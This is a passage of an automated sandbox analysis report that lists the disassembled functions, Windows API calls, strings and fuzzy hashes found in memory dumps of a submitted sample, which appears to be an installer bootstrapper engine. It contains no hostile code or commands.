\\.\pipe\%ls.Cache, xrefs: 004D500C
D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 004D4F08
Failed to allocate full name of pipe: %ls, xrefs: 004D4F84
Failed to allocate full name of cache pipe: %ls, xrefs: 004D5022
Failed to create pipe: %ls, xrefs: 004D4FF6, 004D507C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 1214480349-3253666091
Opcode ID: b8c6c296a4ebc6aa77d047425fb6f4bb7521aa2006bb742be335f0dab883d66c
Instruction ID: 0665c3f52b82e2085a811f2eabeaf290312ac5f0360d67837092773974e7d6a1
Opcode Fuzzy Hash: b8c6c296a4ebc6aa77d047425fb6f4bb7521aa2006bb742be335f0dab883d66c
Instruction Fuzzy Hash: B451D776D40626BBEB219B94CC46FDEBA64BF04720F100127FD10B63D0D7B95E809AD5

Function 004FFA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,004D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 004FFAC7
GetLastError.KERNEL32 ref: 004FFAD1
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 004FFB0E
GetLastError.KERNEL32 ref: 004FFB18
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004FFB5F
ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 004FFB83
GetLastError.KERNEL32 ref: 004FFB8D
CryptDestroyHash.ADVAPI32(00000000), ref: 004FFBCA
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 004FFBE1
GetLastError.KERNEL32 ref: 004FFBFC
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 004FFC34
GetLastError.KERNEL32 ref: 004FFC3E
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 004FFC77
GetLastError.KERNEL32 ref: 004FFC85

Strings

cryputil.cpp, xrefs: 004FFBB1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
String ID: cryputil.cpp
API String ID: 3955742341-2185294990
Opcode ID: f3f9bb90e8cfdb5c04fe7e16ea0b1cc771aa0cb1a6d5b9dcd358cda4a896362c
Instruction ID: 1c9dd1f54085015773c70e45903061c35b738e05d7a192f214993ecc4b09f7a4
Opcode Fuzzy Hash: f3f9bb90e8cfdb5c04fe7e16ea0b1cc771aa0cb1a6d5b9dcd358cda4a896362c
Instruction Fuzzy Hash: 1951D837D4017DABE7318A518C59BEF7A64BF04751F0140B6BF48F6240E3789D889AE8

Function 004D9E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON

Download Yara Rule

Strings

Failed to transfer working path to unverified path for payload: %ls., xrefs: 004D9FA4
Failed to create unverified path., xrefs: 004D9F6E
copying, xrefs: 004DA030, 004DA038
moving, xrefs: 004DA029
Failed to move verified file to complete payload path: %ls, xrefs: 004DA06C
Failed to reset permissions on unverified cached payload: %ls, xrefs: 004D9FF1
Failed to concat complete cached path., xrefs: 004D9EF4
Failed to get cached path for package with cache id: %ls, xrefs: 004D9EC8
Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 004D9FCB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
API String ID: 0-1289240508
Opcode ID: b7152f5fccfba5ab209814944500fe520512f76dbe4828b71ec6a886fac561df
Instruction ID: d72724e3c430e422887ca742433a775139872eec7d9b1f0a3978f4ba2cfc2aa4
Opcode Fuzzy Hash: b7152f5fccfba5ab209814944500fe520512f76dbe4828b71ec6a886fac561df
Instruction Fuzzy Hash: 2E516135944116FADF236F90CC16FAE7F75AF14700F140057FA00B52A0E77A5EA1AB8A

Function 004C62AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 004C62F8
GetLastError.KERNEL32 ref: 004C6302

Strings

variable.cpp, xrefs: 004C6326
Failed to set variant value., xrefs: 004C6423
Failed to get OS info., xrefs: 004C6330

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastVersion
String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
API String ID: 305913169-1971907631
Opcode ID: 4e34e63abae9cdd4d9f9f71407241e889bcee134ebf2402683883f1997949881
Instruction ID: 5f27ccebeafeed4e2d25fddf74c59ce36536e7b0b98aef330494e6c288837882
Opcode Fuzzy Hash: 4e34e63abae9cdd4d9f9f71407241e889bcee134ebf2402683883f1997949881
Instruction Fuzzy Hash: 4E410875A00268ABDB609B59CC49FEF7FB8EB85710F01419FF905E7290C6389E41CB99

Function 004FFEC6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0052B5FC,00000000,?,?,?,?,004E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 004FFEF4
GetCurrentProcessId.KERNEL32(00000000,?,004E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 004FFF04
GetCurrentThreadId.KERNEL32 ref: 004FFF0D
GetLocalTime.KERNEL32(8007139F,?,004E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 004FFF23
LeaveCriticalSection.KERNEL32(0052B5FC,004E12CF,?,00000000,0000FDE9,?,004E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0050001A

Strings

$eR, xrefs: 004FFF61
0eR, xrefs: 004FFF70
%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 004FFFC0
(eR, xrefs: 004FFF5A
,eR, xrefs: 004FFF53

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: $eR$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$(eR$,eR$0eR
API String ID: 296830338-3892700387
Opcode ID: 292854fe03941c9d186bfa8515985873e5a120255cf953b2558550598cd9da32
Instruction ID: 5f90125d2a8ab71894033c3da3d2e9b404704585148bc61960476de317b68514
Opcode Fuzzy Hash: 292854fe03941c9d186bfa8515985873e5a120255cf953b2558550598cd9da32
Instruction Fuzzy Hash: 33417271E00119ABDF219FA5DC44BBFBBB5FF19B11F040126F600A6290D7389D45DBA5

Function 004C6037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004C6062
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 004C6076
GetLastError.KERNEL32 ref: 004C6088
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 004C60DC
GetLastError.KERNEL32 ref: 004C60E6

Strings

variable.cpp, xrefs: 004C60A3, 004C6101
Failed to set variant value., xrefs: 004C6124
Failed to get the Date., xrefs: 004C610B
Failed to get the required buffer length for the Date., xrefs: 004C60AD
Failed to allocate the buffer for the Date., xrefs: 004C60C4

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: 688eab9754c280b755d426d05122b6c35f7fb2f78ba402af02452d0bc25a1b7c
Instruction ID: 7b9113ad3207d1d2656216f88c5cac896b7b1b58ebf67ea43985f1d9500da8f5
Opcode Fuzzy Hash: 688eab9754c280b755d426d05122b6c35f7fb2f78ba402af02452d0bc25a1b7c
Instruction Fuzzy Hash: C331FC36A402267BDB219BDACC46FBF7A78BB04711F11402EFA00F7281DA658D4086E5

Function 004D9B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 004D9BF2
lstrlenW.KERNEL32(?), ref: 004D9C19
FindNextFileW.KERNEL32(00000000,00000010), ref: 004D9C79
FindClose.KERNEL32(00000000), ref: 004D9C84

Part of subcall function 004C3CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 004C3D40
Part of subcall function 004C3CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C3D53

Strings

.unverified, xrefs: 004D9B86
*.*, xrefs: 004D9BCC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 457978746-2528915496
Opcode ID: a8bcc9a62519bdc06d00bc96662ac55e9b7312440a4e7584d0f770d22a7534ee
Instruction ID: 7b1ad4402b65bb36013efee6698223a84f221f350578b92785082e00752e6a89
Opcode Fuzzy Hash: a8bcc9a62519bdc06d00bc96662ac55e9b7312440a4e7584d0f770d22a7534ee
Instruction Fuzzy Hash: FF41A23090052CAEDB21AB60DD5DBEE77B8AF44705F0001E7E908E12A0EB799EC4DF58

Function 0050887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 005088D0
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 005088E2

Strings

%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0050892D
crypt32.dll, xrefs: 005088A0
feclient.dll, xrefs: 005088AA
%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 005088B9

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
API String ID: 1772835396-1985132828
Opcode ID: 84b51ccb9cb24f1ca09d3c136a29b482a5ba33427401e1f0b516017e4b37122f
Instruction ID: 114d7892d9bbd8590a6a40ca065cc7aea56811c89be1a976ae0a3c35ae70958d
Opcode Fuzzy Hash: 84b51ccb9cb24f1ca09d3c136a29b482a5ba33427401e1f0b516017e4b37122f
Instruction Fuzzy Hash: 78212A66900128EAD760DB9ADC05EBFB3FCAB5D711F00455AF945D2190E7389A80D770

Function 004FAA0E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 004FAB54

Strings

1#IND, xrefs: 004FBD4C
1#SNAN, xrefs: 004FBD53
1#INF, xrefs: 004FBD61
1#QNAN, xrefs: 004FBD5A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 02d209139b403ddc13b340821f927eee5957953b5d914fcc290993f6c441c3a6
Instruction ID: 700dd2d4d5cd964df0ebf23e73a6dfdbe1f168dedd661678999249759523d32c
Opcode Fuzzy Hash: 02d209139b403ddc13b340821f927eee5957953b5d914fcc290993f6c441c3a6
Instruction Fuzzy Hash: E2C228B1E0462C8BDB25CE28DD407EAB7B5EB85305F1541EBD90DE7240E778AE818F85

Function 004C61DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 004C620F
GetLastError.KERNEL32 ref: 004C6219

Strings

variable.cpp, xrefs: 004C6238
Failed to set variant value., xrefs: 004C625E
Failed to get the user name., xrefs: 004C6242

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastNameUser
String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: 75fb1ac0f796caeb61ad73c0e072c83642f63bda8eb9ece60360aecb30ec8ae5
Instruction ID: e1cd532ac6d124165063fc2b340dee78b21fdb0654e2bf680bf137f068b3d739
Opcode Fuzzy Hash: 75fb1ac0f796caeb61ad73c0e072c83642f63bda8eb9ece60360aecb30ec8ae5
Instruction Fuzzy Hash: F2014E36A0023967D720EB55CC0AFAF7BA8AF00710F01429FFC10E7281DA789D445BE9

Function 004FFE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,005004F4,?,?,?,?,00000001), ref: 004FFE40
GetLastError.KERNEL32(?,005004F4,?,?,?,?,00000001,?,004C5616,?,?,00000000,?,?,004C5395,00000002), ref: 004FFE4C
LocalFree.KERNEL32(00000000,?,?,00000000,?,?,005004F4,?,?,?,?,00000001,?,004C5616,?,?), ref: 004FFEB5

Strings

logutil.cpp, xrefs: 004FFE6B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: 62907d12d3c2e90f342632e87ef58bc882bf35907e2b89796b68a8c3516aeb71
Instruction ID: 951d41333149a3df089d10a71b5f83b979da1cc29b6203de1fbda384337dcf87
Opcode Fuzzy Hash: 62907d12d3c2e90f342632e87ef58bc882bf35907e2b89796b68a8c3516aeb71
Instruction Fuzzy Hash: 0011BF32A0012DEBDB319F818D05EBF7B68EF14710F01406AFE0496271D7358E24E6A4

Function 004E6B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004E6B32,00000000,00000003), ref: 004E6B9F
GetLastError.KERNEL32(?,004E6B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,004E6F28,?), ref: 004E6BA9

Strings

Failed to set service start type., xrefs: 004E6BD7
msuengine.cpp, xrefs: 004E6BCD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ChangeConfigErrorLastService
String ID: Failed to set service start type.$msuengine.cpp
API String ID: 1456623077-1628545019
Opcode ID: 7871f3bacc7ca1986ed7ebded28b8e3357911ea67f22bcb95e13e6cda2c7b878
Instruction ID: f99fb4ddcdbf43805918a225d10d841f7b053798889c4d138ebe7f24fc0f530b
Opcode Fuzzy Hash: 7871f3bacc7ca1986ed7ebded28b8e3357911ea67f22bcb95e13e6cda2c7b878
Instruction Fuzzy Hash: D4F0A73764913637D62066969C09E8F7E58AF117B1F120316FD38EA2D0DA59990081E4

Function 004F3C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004F3D6E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004F3D78
UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 004F3D85

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 60db922c116b8f9824960c4abe623c2e5d2655cc691d1a03dd6780047ddf62f3
Instruction ID: 00d0a8d41cea0e4ba06a5471bbbadf38b4a72a406fb4f3169b1157f74f6ed90f
Opcode Fuzzy Hash: 60db922c116b8f9824960c4abe623c2e5d2655cc691d1a03dd6780047ddf62f3
Instruction Fuzzy Hash: 5A31E17091122CABCB21DF66D9887DDBBB8BF08311F5045EAE80CA6251E7349F858F49

Function 004F7B87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 004F7C51

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 38f4e3edfabf1dd57c1745346af33e33a4b4ffc9b24ad24ed92f1d86c279f70e
Instruction ID: 46be51c7966bd8cfde533a078c809dd82822d9a4010c2a14473e5731cf9b8581
Opcode Fuzzy Hash: 38f4e3edfabf1dd57c1745346af33e33a4b4ffc9b24ad24ed92f1d86c279f70e
Instruction Fuzzy Hash: 19415B7250021C6FCB209F79CC88EBB77B8EB84314F50026EFA05C7281E6399E81CB58

Function 004FA560 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
Instruction ID: 511f10e6940c609c6bcdd0ed8a0780da7cd1010a51704083f636a59807ede33d
Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
Instruction Fuzzy Hash: 71025CB1E002199FDF14DFA9C880AAEB7F1EF88314F25816AD919E7380D734AD51CB95

Function 00503A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00503BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00503A8E,?), ref: 00503C62

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00503AB2
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00503AC3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AllocateCheckCloseInitializeMembershipToken
String ID:
API String ID: 2114926846-0
Opcode ID: 0adaf4753a6f9daf671316e03d147c7cb52e42f362e75bbe494d7e02016e83c8
Instruction ID: 00f421829c8078ec53a0fbfc88b69aaa7fa28167d9c7a8050842c3ab9e9bf723
Opcode Fuzzy Hash: 0adaf4753a6f9daf671316e03d147c7cb52e42f362e75bbe494d7e02016e83c8
Instruction Fuzzy Hash: 5E110571A0021AAFDB10DFA5DC89BAFBBBCFF18304F54482EA541A6191E7709A44CB65

Function 00504440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(004E923A,?,00000100,00000000,00000000), ref: 0050447B
FindClose.KERNEL32(00000000), ref: 00504487

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 8dd79f228c8919504b3519e6a1b53b1a2be8565909d418a1993d17ed889405ab
